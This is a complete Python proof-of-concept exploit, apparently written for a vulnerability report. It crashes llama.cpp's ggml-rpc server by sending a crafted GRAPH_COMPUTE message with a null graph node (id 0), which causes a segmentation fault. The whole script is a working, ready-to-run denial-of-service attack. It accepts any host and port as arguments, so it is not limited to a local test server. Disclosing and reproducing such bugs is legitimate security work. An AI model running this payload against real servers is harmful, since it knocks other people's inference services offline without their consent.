poc-054-rpc-graph-null-node.py

#!/usr/bin/env python3
"""
PoC for CRUCIBLE-2026-054: Null Pointer Dereference in RPC graph_compute Node Deserialization

Crashes any ggml-rpc server (rpc-server binary) by sending a GRAPH_COMPUTE message
with a graph node whose ID is 0. The server accepts null nodes when id==0, then
dereferences them via ggml_is_empty() → SIGSEGV.

Usage:
    ./build/bin/rpc-server -p 50052        # terminal 1
    python3 poc-054-rpc-graph-null-node.py  # terminal 2 → server crashes

Tested: llama.cpp HEAD 66c4f9ded (2026-04), release build, Fedora 43 x86_64.
"""
import socket, struct, sys, time

HOST = sys.argv[1] if len(sys.argv) > 1 else "127.0.0.1"
PORT = int(sys.argv[2]) if len(sys.argv) > 2 else 50052

s = socket.socket()
s.settimeout(5)
s.connect((HOST, PORT))
print(f"Connected to {HOST}:{PORT}")

# RPC wire format: cmd (1 byte) + size (8 bytes) + data
# HELLO = cmd 14, zero-length body
s.sendall(struct.pack("<B", 14))
s.sendall(struct.pack("<Q", 0))

resp_size = struct.unpack("<Q", s.recv(8))[0]
resp_data = s.recv(resp_size)
print(f"RPC version: {resp_data[0]}.{resp_data[1]}.{resp_data[2]}")

# GRAPH_COMPUTE = cmd 10
# 30-byte payload: device=0, n_nodes=1, n_tensors=0, node[0].id=0 (trigger)
payload = bytes.fromhex(
    "000000000100000000000000000000000000000000000000000000002600"
)
s.sendall(struct.pack("<B", 10))
s.sendall(struct.pack("<Q", len(payload)))
s.sendall(payload)
print(f"Sent GRAPH_COMPUTE ({len(payload)} bytes)")

time.sleep(1)
try:
    resp = s.recv(4096)
    if len(resp) == 0:
        print("CRASH: server closed connection (segfault)")
    else:
        print(f"Server responded ({len(resp)} bytes) - not vulnerable?")
except ConnectionResetError:
    print("CRASH: ConnectionReset")
except Exception as e:
    print(f"CRASH likely: {e}")
s.close()